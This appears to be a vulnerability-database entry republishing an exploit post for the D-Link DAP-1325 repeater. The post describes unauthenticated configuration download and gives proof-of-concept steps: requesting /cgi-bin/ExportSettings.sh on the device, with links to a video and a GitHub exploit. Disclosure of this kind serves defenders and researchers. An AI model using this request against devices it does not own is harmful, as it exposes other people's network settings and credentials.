D-Link DAP-1325 Insecure Direct Object Reference

2023.07.06
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: D-Link DAP-1325 - Broken Access Control # Date: 27-06-2023 # Exploit Author: ieduardogoncalves # Contact : twitter.com/0x00dia # Vendor : www.dlink.com # Version: Hardware version: A1 # Firmware version: 1.01 # Tested on:All Platforms 1) Description Security vulnerability known as "Unauthenticated access to settings" or "Unauthenticated configuration download". This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication. IN MY CASE, Tested repeater IP: http://192.168.0.21/ Video POC : https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=0 2) Proof of Concept Step 1: Go to Repeater Login Page : http://192.168.0.21/ Step 2: Add the payload to URL. Payload: http://{ip}/cgi-bin/ExportSettings.sh Payload: https://github.com/eeduardogoncalves/exploit


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top